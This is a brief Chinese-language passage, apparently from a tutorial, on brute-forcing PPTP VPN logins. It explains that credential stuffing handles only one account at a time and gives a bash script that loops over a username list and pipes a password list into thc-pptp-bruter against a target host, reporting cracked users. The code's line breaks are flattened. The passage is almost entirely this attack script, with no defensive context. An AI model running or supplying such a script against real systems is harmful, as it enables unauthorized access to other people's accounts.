这样的话,每次只能撞库一个账号,可以写个shell脚本来批量。
1
2
3
4
5
6
| #!/bin/bashcat user.txt | while read linedo echo -e It is cracked user "\033[32;49;1m$line\033[39;49;0m" cat /tmp/vpnpass | thc-pptp-bruter -u $line -n 99 -l 9999 x.x.x.xdone |
